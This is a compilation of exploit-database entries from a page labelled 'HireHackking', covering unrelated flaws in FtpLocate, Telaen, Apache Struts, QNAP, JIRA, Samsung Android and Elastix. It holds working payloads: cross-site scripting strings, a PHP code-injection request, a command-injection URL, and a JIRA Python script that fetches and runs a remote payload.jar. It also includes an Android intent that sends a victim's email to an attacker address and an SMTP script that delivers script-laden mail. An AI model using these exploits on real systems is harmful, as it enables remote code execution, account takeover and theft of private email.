FtpLocate is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

FtpLocate 2.02 is vulnerable; other versions may also be affected. 

http://www.example.com/cgi-bin/ftplocate/flsearch.pl?query=FTP&fsite=<script>alert('xss')</script>
HireHackking 
================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                      
================================================================================


######################################################
# Exploit Title: Sagem javascript injection 
# Date: 27/10/15
# Exploit Author: Soufiane Alami Hassani
# Version: FAST3304-V2
# Tested on: [Windows 8.1 Pro]
# Category : webapps
# Facebook : soufiane.a.hassani
# Email    : nios1515@gmail.com
######################################################


###########################
#By Soufiane Alami Hassani#
###########################

Vulnerability Description : You can change the password of your router even if you have not the access.

Exploit : In Bar address copy and paste : "javascript:mimic_button('goto: 9096..')" the router redirect you to another page to change the password .

########################
Moroccan Are The Best .
########################


mimic_button('goto: 9096..')
HireHackking 
source: https://www.securityfocus.com/bid/60290/info

Telaen is prone to an open-redirection vulnerability.

An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.

Versions prior to Telaen 1.3.1 are vulnerable. 

http://www.example.com/telaen/redir.php?http://www.malicious-site.com
HireHackking 
source: https://www.securityfocus.com/bid/60288/info

Telaen is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to Telaen 1.3.1 are vulnerable. 

http://www.example.com/telaen/index.php?tid=default&lid=en_UK&f_email="><script>alert("XSS")</script>
HireHackking 
source: https://www.securityfocus.com/bid/60337/info

CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

CMS Gratis Indonesia 2.2 beta 1 is vulnerable; other versions may also be affected. 

POST /cmsid/?setup=yes HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/cmsid/?setup=yes
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1; __utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw_');phpinfo();//&step_1=Next+%C2%BB%C2%BB
HireHackking 
source: https://www.securityfocus.com/bid/60340/info

Telaen is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.

Versions prior to Telaen 1.3.1 are vulnerable.

hhtp://www.example.com//telaen/inc/init.php
HireHackking 
source: https://www.securityfocus.com/bid/60345/info

Apache Struts is prone to a remote OGNL expression injection vulnerability.

Remote attackers can exploit this issue to manipulate server-side objects and execute arbitrary commands within the context of the application.

Apache Struts 2.0.0 through versions 2.3.14.3 are vulnerable. 

http://www.example.com/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D

http://www.example.com/example/${#foo='Menu',#foo}
HireHackking 
source: https://www.securityfocus.com/bid/60354/info

QNAP VioStor NVR and QNAP NAS are prone to a remote code-execution vulnerability.

Successfully exploiting this issue may allow an attacker to execute arbitrary code with elevated privileges in the context of the user running the affected application.

The following are vulnerable:

QNAP VioStor NVR running firmware 4.0.3.
QNAP NAS 

http://www.example.com/cgi-bin/pingping.cgi?ping_ip=1;whoami
HireHackking 
############################################################################
# JIRA and HipChat for JIRA plugin Velocity Template Injection Vulnerability
# Date: 2015-08-26
# CVE ID: CVE-2015-5603
# Vendor Link: https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html
#
# Product: JIRA and the HipChat for JIRA plugin.
# Affected HipChat For JIRA plugin versions: 1.3.2 <= version < 6.30.0
# Affected JIRA product versions: 6.3.5 <= version <  6.4.11
#
# Discovered internally by Atlassian (vendor)
# Proof of concept script by Chris Wood <chris@invivid.com>
#
# Tested against JIRA 6.3.4a with HipChat 6.29.2 on Windows 7 x64
# Allows any authenticated JIRA user to execute code running as Tomcat identity
############################################################################

import urllib2
import json

# cookie of any authenticated session (ex. jira-user)
JSESSIONID = '541631B0D72EF1C71E932953F4760A70'

# jira server
RHOST      = 'http://192.168.2.15:8080'

# samba public share, read/write to anonymous users
CMD 	   = ' java -jar \\\\192.168.2.234\\public\\payload.jar '
data = {
    'message': ' $i18n.getClass().forName(\'java.lang.Runtime\').getMethod(\'getRuntime\', null).invoke(null, null).exec(\'' + CMD + '\').waitFor() '
}

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'JSESSIONID=' + JSESSIONID))
urllib2.install_opener(opener)
req = urllib2.Request(RHOST + '/rest/hipchat/integrations/1.0/message/render/')
req.add_header('Content-Type', 'application/json')

response = urllib2.urlopen(req, json.dumps(data))

print('##################################')
print('######### CVE-2015-5603 ##########')
print('##################################')
print(response.read())
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=490

The SecEmailComposer/EmailComposer application used by the Samsung S6 Edge has an exported service action to do quick replies to emails. It was found that this action required no permissions to call, and could lead to an unprivileged application gaining access to email content.

Service Action: com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND
Component: com.samsung.android.email.composer
Class Name: com.samsung.android.email.composer.service.QuickReplyService

The service takes a JSON encoded string with various additional parameters. We need to know two parameters, the email address of the local account and a message ID. We can guess a valid message ID (which just seems to be an incrementing number).

If we guess an invalid ID the service simply returns, but if we do get a valid ID the service seems to automatically create the reply email, attach an attacker supplied message as well as the contents of the original message and sends it to any email address you like. For example:

Intent intent = new Intent();
intent.setAction("com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND");
intent.setClassName("com.samsung.android.email.composer",
       "com.samsung.android.email.composer.service.QuickReplyService");
intent.putExtra("data", "{'original-msg-id':1, " +
       "'account-id':'project.zero.victim@gmail.com', " +
       "'msg':'Hello World!'," +
       "'title':'Hello Title'," +
       "'toList':'project.zero.attacker@gmail.com'}");
ComponentName name = MainActivity.this.startService(intent);

No permissions are required to send this service intent. If successfully sent this will show up in a "sent email" notification and will be present user’s sent email folder.
HireHackking 
source: https://www.securityfocus.com/bid/60426/info

Resin Professional is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Resin Professional 4.0.36 is vulnerable; other versions may also be affected. 

http://www.example.com/resin-admin\?%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=493

The Samsung m2m1shot driver framework is used to provide hardware acceleration for certain media functions, such as JPEG decoding and scaling images. The driver endpoint (/dev/m2m1shot_jpeg) is accessible by the media server

The Samsung S6 Edge is a 64-bit device, so a compatibility layer is used to allow 32-bit processes to provide structures that are expected by the 64-bit driver. There is a stack buffer overflow in the compat ioctl for m2m1shot:

static long m2m1shot_compat_ioctl32(struct file *filp,
                                unsigned int cmd, unsigned long arg)
{
...
        switch (cmd) {
        case COMPAT_M2M1SHOT_IOC_PROCESS:
        {
                struct compat_m2m1shot data;
                struct m2m1shot_task task;
                int i, ret;

                memset(&task, 0, sizeof(task));

                if (copy_from_user(&data, compat_ptr(arg), sizeof(data))) {
                        dev_err(m21dev->dev,
                                "%s: Failed to read userdata\n", __func__);
                        return -EFAULT;
                }

                ...
                for (i = 0; i < data.buf_out.num_planes; i++) {
                        task.task.buf_out.plane[i].len =
                                                data.buf_out.plane[i].len;
                        ...
                }

In this code snippet, the data.buf_out.num_planes value is attacker-controlled "u8" value, and is not bounds checked. However, task.task.buf_out.plane array is fixed in size (three elements), so a buffer overflow can occur during the loop shown above.

Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c).

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=492

The Samsung Graphics 2D driver (/dev/fimg2d) is accessible by unprivileged users/applications. It was found that the ioctl implementation for this driver contains a locking error which can lead to memory errors (such as use-after-free) due to a race condition.

The key observation is in the locking routine definitions in fimg2d.h:

#ifdef BLIT_WORKQUE
#define g2d_lock(x)             do {} while (0)
#define g2d_unlock(x)           do {} while (0)
#define g2d_spin_lock(x, f)     spin_lock_irqsave(x, f)
#define g2d_spin_unlock(x, f)   spin_unlock_irqrestore(x, f)
#else
#define g2d_lock(x)             mutex_lock(x)
#define g2d_unlock(x)           mutex_unlock(x)
#define g2d_spin_lock(x, f)     do { f = 0; } while (0)
#define g2d_spin_unlock(x, f)   do { f = 0; } while (0)
#endif

This means that the g2d_lock/g2d_unlock routines are no-ops when BLIT_WORKQUE is defined, which appears to be the default configuration. Unfortunately the alternative spin lock routines are not used consistently with this configuration. For example, the FIMG2D_BITBLT_BLIT ioctl command (with notes annotated as "PZ"):

ctx = file->private_data; /* PZ: ctx allocated at open(), lives on the heap. */

switch (cmd) {
case FIMG2D_BITBLT_BLIT:

	mm = get_task_mm(current);
	if (!mm) {
		fimg2d_err("no mm for ctx\n");
		return -ENXIO;
	}

	g2d_lock(&ctrl->drvlock); /* PZ: This is a no-op. */

	ctx->mm = mm;

	ret = fimg2d_add_command(ctrl, ctx, (struct fimg2d_blit __user *)arg);
	if (ret) {
		...
	}

	ret = fimg2d_request_bitblt(ctrl, ctx); /* PZ: Does stuff with the ctx. */
	if (ret) {
		...
	}

	g2d_unlock(&ctrl->drvlock); /* PZ: Another no-op */

As the lock macros are no-ops, a second process can change ctx->mm when the original process is still using the same ctx->mm (as long as it has access to the same file descriptor).

Reproduction steps:
Open /dev/fimg2d
Fork to get two processes with different mm’s with the access to the fd
Concurrently call the FIMG2D_BITBLT_BLIT ioctl from both processes.
One ioctl should have valid data, the other should fail

At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c)

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip
HireHackking 
# Source: https://code.google.com/p/google-security-research/issues/detail?id=494

'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events.

At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. 

This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.

Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"

msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you

text = "Hello There!"
html = """\
<html>
  <head></head>
  <body>
   <p>
       <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
    </p>
  </body>
</html>
"""

part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

msg.attach(part1)
msg.attach(part2)

s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()
HireHackking 
source: https://www.securityfocus.com/bid/60262/info

Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

https://www.example.com/libs/jpgraph/Examples/bar_csimex3.php/"><IMg srC= x OnerRoR = alert(1337)>
https://www.example.comlibs/magpierss/scripts/magpie_simple.php?url="><IMg+srC%3D+x+OnerRoR+%3D+alert(1337)>